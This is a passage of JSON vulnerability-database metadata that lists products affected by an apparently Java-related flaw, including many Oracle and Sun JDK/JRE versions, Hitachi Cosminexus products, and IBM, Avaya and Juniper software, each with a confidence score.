"model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "0107-00" }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus application server 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus studio 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jre", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus primary server base 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer professional 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0108-50" }, { "model": "cosminexus application server standard 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus primary server base 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus client 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-50" }, { "model": "cosminexus application server enterprise 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "junos space", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "15.1" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.30" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "cosminexus application server standard 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cosminexus application server enterprise 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus application server 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "cosminexus application server enterprise 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "jrockit r28.3.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-00" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "runtimes for java technology 7r1 sr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.11" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "cosminexus developer professional 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "cosminexus client 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ts7740 virtualization engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3957-v06" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.110" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "cosminexus client 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "quickfile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "web sphere real time service refresh", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "36" }, { "model": "cosminexus developer light 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-20" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "cosminexus application server enterprise 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 